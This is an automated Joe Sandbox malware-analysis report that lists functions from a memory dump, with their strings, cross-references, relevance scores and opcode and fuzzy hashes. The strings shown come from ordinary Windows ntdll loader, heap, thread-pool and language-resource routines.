Download Yara Rule

APIs

Part of subcall function 01692DF0: LdrInitializeThunk.NTDLL ref: 01692DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01690BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01690BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01690D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01690D74

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 4b0f8918de87911f4e2c55afcc8c2f510537e91604d7acfa33931aa0713d0842
Instruction ID: f44efea9ab64eeb3df0ce60a63bdd77d0a126d3a82fb756962472be6a875d94d
Opcode Fuzzy Hash: 4b0f8918de87911f4e2c55afcc8c2f510537e91604d7acfa33931aa0713d0842
Instruction Fuzzy Hash: 2B4248719007159FDB21CF68CC80BAAB7F9FF44314F1445AEE989AB241E770AA85CF60

Function 0165A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 0165A3F7
8, xrefs: 0165A3E7
LdrResFallbackLangList Exit, xrefs: 0165A3FF
LdrResFallbackLangList Enter, xrefs: 0165A3EF

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 17fce8484a0571b0c2c90de807f807720e417a58bd54ad0f6f753539e451f076
Instruction ID: af2aa1ecb612ac3eacefcfab1d409076f29b867369afa204e6918784c0890f4c
Opcode Fuzzy Hash: 17fce8484a0571b0c2c90de807f807720e417a58bd54ad0f6f753539e451f076
Instruction Fuzzy Hash: DDC17D751083828FD751CF98C850B6ABBE4BF88708F048A6EFD958B351E734D94ACB56

Function 01688402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01688421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0168855E
LdrpInitializeProcess, xrefs: 01688422
@, xrefs: 01688591

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: b2bb069274679f6c132146b9ee99c7e4059979d6abacf3f4f092752783fb4b95
Instruction ID: d9412c486c5c432d21a5fc5bf2cbb0bd4695b4a44f01fb2a15154cfb859acfb1
Opcode Fuzzy Hash: b2bb069274679f6c132146b9ee99c7e4059979d6abacf3f4f092752783fb4b95
Instruction Fuzzy Hash: 0B919D71609345AFDB21EF25CC50EABBAEDFF84654F804A2EFA8593151E330D904CB66

Function 0168273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 016C21DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016C22B6
.Local, xrefs: 016828D8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016C21D9, 016C22B1

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: df06257f08e189b03edcc3799d8db6575386f935600f819d9bc80b37d56747c6
Instruction ID: 030f72587b449e8161d4458e8631649cd9085afc9068eb06877d6d286a6bcc5c
Opcode Fuzzy Hash: df06257f08e189b03edcc3799d8db6575386f935600f819d9bc80b37d56747c6
Instruction Fuzzy Hash: 24A1BD359002299BDF24DF69CC98BA9B3B5BF58714F1542EED908A7351D730AE81CF84

Function 016564AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016B10AE
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 016B0FE5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 016B1028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 016B106B

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 841ffdfee5038ea82f8141fe304413d03a068611e7bf23a36f37bae65ccec413
Instruction ID: 77faaf1e3125043a384daa5b023179323e7a7b019b80a5ef8aa10cfca729fe3d
Opcode Fuzzy Hash: 841ffdfee5038ea82f8141fe304413d03a068611e7bf23a36f37bae65ccec413
Instruction Fuzzy Hash: 9E71EAB1944305AFCB61DF18CC80B9B7FA9AF94768F80046CFD498B286D734D589CB92

Function 0167245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01672462
LdrpDynamicShimModule, xrefs: 016BA998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 016BA992
minkernel\ntdll\ldrinit.c, xrefs: 016BA9A2

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 8e925fdd838116cfe39c6ffdbd262b0888224e87d7d857acae838f8723d10112
Instruction ID: e67786746d7a8537b453b3641cb402564647d06cb741916f24da5885e5712535
Opcode Fuzzy Hash: 8e925fdd838116cfe39c6ffdbd262b0888224e87d7d857acae838f8723d10112
Instruction Fuzzy Hash: B2315979A40201EBEB31EF9DCCC1AAAB7B9FB84B20F15405EF90567345C7709882CB90

Function 016629A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01663255
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0166327D
HEAP: , xrefs: 01663264

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 6e79ccde7ddae84052cfd5accd86278391e5392c16c976a5398ce9610d435534
Instruction ID: 8330ff6707519447bcb10c8447fd42d214d668ab7a3d0fe9b8be8e7d7f4e4386
Opcode Fuzzy Hash: 6e79ccde7ddae84052cfd5accd86278391e5392c16c976a5398ce9610d435534
Instruction Fuzzy Hash: 9092AA71A042499FDB25CFA8C8547AEBBF5FF48304F18806DE84AAB391D735A946CF50

Function 01660770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 016B50AE
(UCRBlock->Size >= *Size), xrefs: 016B50CA
HEAP: , xrefs: 016B50BD

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: cb1c9cebb7d21c087b6e7e8da95c856e453ac6faf777e05cef1c6644c2afbd12
Instruction ID: a03a9c418976b644ce74e403defdc5a3e1d6ec7ca777833d599117b95c4de1bf
Opcode Fuzzy Hash: cb1c9cebb7d21c087b6e7e8da95c856e453ac6faf777e05cef1c6644c2afbd12
Instruction Fuzzy Hash: 6CF19D74601606EFEB25CF68CC94BAAB7BAFF44304F148269F5169B385D734E981CB90

Function 01676962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01676C24
, xrefs: 016BCA51

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 5a8bc026fc0fd6e7982b1eac4a11387ea37ff5008867ea9e5f18a5a540855c77
Instruction ID: e0d4682db2d3451760f6d3182b3f943b2a878f254fa372b46d3878d117a03006
Opcode Fuzzy Hash: 5a8bc026fc0fd6e7982b1eac4a11387ea37ff5008867ea9e5f18a5a540855c77
Instruction Fuzzy Hash: 22C27B716087419FEB25CF28CC84BABBBE5AF88714F04892DF99987341E734D945CB92

Function 0164A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 0164A1C1
FilterFullPath, xrefs: 016AC2E6
\??\, xrefs: 016AC1E4

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 412f39131e03ff3b87bee405470466dc431242b20c19a2bac5c5f4dde84f84e9
Instruction ID: 79dcc30fcf85335b68131d1b425479e90c6713e34a81c956e2ec68e69a9aa347
Opcode Fuzzy Hash: 412f39131e03ff3b87bee405470466dc431242b20c19a2bac5c5f4dde84f84e9
Instruction Fuzzy Hash: B3A19C76911629ABDF31DF68CC88BEAB7B8EF44710F0041EAE909A7250D7359E84CF54

Function 01670BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 016BA121
Failed to allocated memory for shimmed module list, xrefs: 016BA10F
LdrpCheckModule, xrefs: 016BA117

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: a7f9fae4bcbe65a5aab7323f3949ba24410b6b3846c4f86ff961bf1233ad00ed
Instruction ID: 51ae48a174a4494b3714257d68c402a36b18f80e650d7d8b88fdd70b44151fe2
Opcode Fuzzy Hash: a7f9fae4bcbe65a5aab7323f3949ba24410b6b3846c4f86ff961bf1233ad00ed
Instruction Fuzzy Hash: 2E71CE75A00205DFDB29DFA8CD81AAEB7F5FB45714F14806EE806E7311E734A982CB60

Function 0168C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 016C82DE
minkernel\ntdll\ldrinit.c, xrefs: 016C82E8
Failed to reallocate the system dirs string !, xrefs: 016C82D7

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 18e6d7a0973fc5d7dcb3672234b4636e337a45c46fccdbf6dbb5548b113e17cc
Instruction ID: 3a092fe6bf516d5fbbe7fde15f30fe639e63994da52d34ca75f9fe491d90e7ac
Opcode Fuzzy Hash: 18e6d7a0973fc5d7dcb3672234b4636e337a45c46fccdbf6dbb5548b113e17cc
Instruction Fuzzy Hash: 7541CEB5544311EBC731FB68DC44BAB77E9EB59B60F00892EFA4997250E770D800CBA6

Function 0170C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0170C1C5
@, xrefs: 0170C1F1
PreferredUILanguages, xrefs: 0170C212

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: f27b6e2da8a20a6fc530589ed88bbb8ea2fb2552891bc6af0c2f7f998e7dd5f3
Instruction ID: e4d44f257f7f51532806f0491cadcab56dfdc82c8cd8ec5ed8064d09b4a47254
Opcode Fuzzy Hash: f27b6e2da8a20a6fc530589ed88bbb8ea2fb2552891bc6af0c2f7f998e7dd5f3
Instruction Fuzzy Hash: 7A417171E04319EBDF12DAD8CC91BEEFBFDAB18704F1041AAE609A7680D7749A448B54

Function 016E4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 016E4225
LdrpResValidateFilePath Enter, xrefs: 016E4160
LdrpResValidateFilePath Exit, xrefs: 016E4172

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 9efd14f3c52871d45a2474f84c5363793d326bfba2ef4f9f870cc5e93b8b16c2
Instruction ID: b40816d273a82b5a2800af6deabca28b130a9d0df55e7468579c044d2cdce0bc
Opcode Fuzzy Hash: 9efd14f3c52871d45a2474f84c5363793d326bfba2ef4f9f870cc5e93b8b16c2
Instruction Fuzzy Hash: CD41E272A022588FEB25DBA9CC58BADBBF9FF55340F14065ADA01EB781DB359901CB10

Function 016D4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 016D4888
LdrpCheckRedirection, xrefs: 016D488F
minkernel\ntdll\ldrredirect.c, xrefs: 016D4899

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 2b7a2b5c6b6289b6af8dc2cc3d7e81d16469d1c78302694de003bbd1fd37ec21
Instruction ID: bc5412cdb793e5e452a28446b936a2c08d889da0fc24246bbe608c1b51ace98e
Opcode Fuzzy Hash: 2b7a2b5c6b6289b6af8dc2cc3d7e81d16469d1c78302694de003bbd1fd37ec21
Instruction Fuzzy Hash: 3E419032E046519BCB21CE58DC41A267BE9EF89A90F07056DED89E7B51DB30DC00CB91

Function 01660BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 016B5431
HEAP: , xrefs: 016B543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 016B5449

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 68de6135c3d0febc2bfd0345b9c072f9b01c696fa5becb495af9ee19c91afde1
Instruction ID: 1ae819a38a8203b858b2f7ee6dd56154edc9b990cc7384d31d616c1806d98365
Opcode Fuzzy Hash: 68de6135c3d0febc2bfd0345b9c072f9b01c696fa5becb495af9ee19c91afde1
Instruction Fuzzy Hash: 71119D353161429FDB29DA28CC85BAAB3A9EF41715F18C16EF4078B291DB38D881CB55

Function 016D20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 016D20F3
LdrpInitializationFailure, xrefs: 016D20FA
minkernel\ntdll\ldrinit.c, xrefs: 016D2104

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: abcbe83f51c669f3d4c00a36c715abf852cad38bead6cf68a4afa6f661645750
Instruction ID: 52ab0d6e5747915831d28cbaca5d957f3e9b2756e5809330d19c708ead14f634
Opcode Fuzzy Hash: abcbe83f51c669f3d4c00a36c715abf852cad38bead6cf68a4afa6f661645750
Instruction Fuzzy Hash: CAF02278A40318ABE720EA4CCC62FAA3B68EB80B24F10405DFB4467281D7B0A940CA80

Function 016603E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 016B4D8A

Strings

#%u, xrefs: 016B4D82

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 78b6d18e340489a70238d77f55548882ed3c334dcf39e747ae8b990da83981fc
Instruction ID: 96e0cf5d6b3405053ee7333b77eabb242744e08a3a6254442d86012e730fbb0f
Opcode Fuzzy Hash: 78b6d18e340489a70238d77f55548882ed3c334dcf39e747ae8b990da83981fc
Instruction Fuzzy Hash: 58713672A0014A9FDB11DFA8CD90AAEB7F9EF18744F144069E905A7352EB34A941CBA4

Function 0165A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 0165AA13
LdrResSearchResource Exit, xrefs: 0165AA25

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: e38cc07194ffc46bb7f493d0761d730a0c505eb259ed48b07357cf7c809f0977
Instruction ID: 45e6d29485dfc4d0106a110a20e705c35651097f1f320fb4bd119f24e411588c
Opcode Fuzzy Hash: e38cc07194ffc46bb7f493d0761d730a0c505eb259ed48b07357cf7c809f0977
Instruction Fuzzy Hash: 47E15E71A00219ABEB62CEDDCD94BEEBBBABF44310F14462AED01E7351D7749981CB50

Function 0171A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0171A44B
`, xrefs: 0171A551

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 8dd8dea7965882754346ae62f69db568e63a01cb19f5b3e7ab4e4cbd6b97d51b
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 68C1C0312053829BEB25CF2CC845B6BFBE5AFC4318F184A2DFA968B299D774D505CB41

Function 016CE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 016CE751
Legacy, xrefs: 016CE75A

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 6be958a5d261290e3b6ea83f84b6dc6b33c31e9081167572059441b301979a2c
Instruction ID: 4f3d44c67c274fdf5991ce5181aee0cba0308fe5e8ee2c3c8b42c1be3da3db84
Opcode Fuzzy Hash: 6be958a5d261290e3b6ea83f84b6dc6b33c31e9081167572059441b301979a2c
Instruction Fuzzy Hash: 63612A71E016199FDB24DFA88D40ABEBBB9FB48B00F15406DE649EB251D732A901CB54

Function 016F43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 016F4525
@, xrefs: 016F4437

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: dc57c6ac5b20a25dc6c32c2a04b500c518f0cd458b8b598c1d329cc56fbbfda8
Instruction ID: 0d4a18670e43b67a64b23cdcc4fc07ef7e76b9bf2a3a8ada4a5266280eb04efa
Opcode Fuzzy Hash: dc57c6ac5b20a25dc6c32c2a04b500c518f0cd458b8b598c1d329cc56fbbfda8
Instruction Fuzzy Hash: 02511671E0121DAFDF11DFA9CC94AEFBBBDEB44654F10052DEA11B7680DB309A058BA4

Function 016504E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0165063D
kLsE, xrefs: 01650540

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 2b8b10ce260b3597cf250d20dcfd2ca20fd8af5084877dad8421e6dac9fdce6c
Instruction ID: 146a932f67f0b7299cec4d0906d7dcb6299c1e9fe2eaa7a1b599fc8b4a1eb98c
Opcode Fuzzy Hash: 2b8b10ce260b3597cf250d20dcfd2ca20fd8af5084877dad8421e6dac9fdce6c
Instruction Fuzzy Hash: 6551CFB15047428FD764DF68C9406A7BBE8AF85304F10883EFA9A87341E770D545CFA6

Function 0165A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 0165A2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 0165A309

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 17df793beaf747154a36b817f31a5b0cca06bf2351f507d4081398a34b780ebd
Instruction ID: 61a46f7e51ac059170cb74f6fa2d786a27f8b06b7c17aa035da15aa4cecdd508
Opcode Fuzzy Hash: 17df793beaf747154a36b817f31a5b0cca06bf2351f507d4081398a34b780ebd
Instruction Fuzzy Hash: DF41AB31A00655DBDB218F99CC90BAA7BF5FF84308F1441A9ED05DB392E7B5D941CB50

Function 0168A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0168A5E9
Cleanup Group, xrefs: 0168A5E4

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: d031f209a849cf23fe753327a73df7ad71ebf35785cc381712eb8688f466b0e3
Instruction ID: daf0c84370f54f6d61db35326d83ee6b3f726df6af596bdb2549b048a471b390
Opcode Fuzzy Hash: d031f209a849cf23fe753327a73df7ad71ebf35785cc381712eb8688f466b0e3
Instruction Fuzzy Hash: 8301D1B2651740AFD321EF54CD45B2677E8E785729F008A3EFA49C7194E334D844CB4A

Function 0165C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0165C8C3, 0165CA40

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 2196c9bfc081e779619094edbdc20bb77fea6e7527570082df2736b5ce12398c
Instruction ID: 347eb721ece3e7481a75be151f125a79f1bd0b8c3de0706535cd847e3adf7d66
Opcode Fuzzy Hash: 2196c9bfc081e779619094edbdc20bb77fea6e7527570082df2736b5ce12398c
Instruction Fuzzy Hash: 6B824A75E003198BEB65CFA9CC80BEDBBB5BF48350F148169DD19AB391D7309982CB54

Function 016D6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 016D65C1

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 559b667180bb4d758bb39fd9f1036c1ee87923066ea9910d9bbb4b94673ca253
Instruction ID: ad0b3d28178cc3680ff2302f3409ccce7a83118456aae62e12850d8fac3d1f6e
Opcode Fuzzy Hash: 559b667180bb4d758bb39fd9f1036c1ee87923066ea9910d9bbb4b94673ca253
Instruction Fuzzy Hash: 91918571D01219AFEB21DF95CD85FAEBBB9EF14750F104059F600AB291D774AD00CBA4

Function 016FE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 016FE1FA

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: b68b6f7632ba549e85dab542a55fb75d866b047eb2ac7e3a9b4f2afe27a23a6e
Instruction ID: 5d4d4b7be584f273356f5c3f87e7a48d61b215f3bf20a8946655ae53f11440a6
Opcode Fuzzy Hash: b68b6f7632ba549e85dab542a55fb75d866b047eb2ac7e3a9b4f2afe27a23a6e
Instruction Fuzzy Hash: 5A91A132901609AFDB22ABA5DC44FAFBF7AEF45744F11001DF605A7260EB369902CB55

Function 0168A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 016C67C9

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: c1918871aa0c9df7b773d35502d2c690889fbe3db6eadf56cde6e12112fe4d62
Instruction ID: 9b61f02561f2dbe348bdb3baa06586f9de8ee473f8ee427565ebb03ae3af9f4c
Opcode Fuzzy Hash: c1918871aa0c9df7b773d35502d2c690889fbe3db6eadf56cde6e12112fe4d62
